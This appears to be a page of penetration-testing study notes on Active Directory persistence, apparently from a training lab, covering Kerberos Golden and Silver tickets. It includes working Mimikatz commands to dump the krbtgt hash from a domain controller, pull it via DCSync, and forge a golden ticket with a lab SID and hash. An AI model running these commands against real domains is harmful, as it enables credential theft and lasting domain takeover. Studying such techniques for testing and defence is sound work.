search

Persistance

DC only validates when TGT's lifetime is more than 20 minutes. so we can even use deleted accounts KDC only checks the TGT

hashtag
Kerberos

hashtag
Golden Ticket

It has a very long lifetime like 10 years encrypted by the hash of krbtgt account First create a token on behalf of domain admin

hashtag
Execute mimikatz on DC as DA to get krbtgt hash

klist purge // to delete all tickets
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dc

hashtag
To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges: 

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the target DC.

hashtag
On any machine to get a golden ticket

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

hashtag
Silver Ticket

Has a very short lifetime and gives access to the services given by the service account encrypted by the hash of service account silver tickets can issued for services like HOST(schedule tasks), CIFS(Shares), RPCSS, WSMAN

here service account is a machine account for ex. DCORP-DC$ (1000)

hashtag
Command Execution with Silver ticket

PreviousLateral MovementNextPrivilege Escalation

Last updated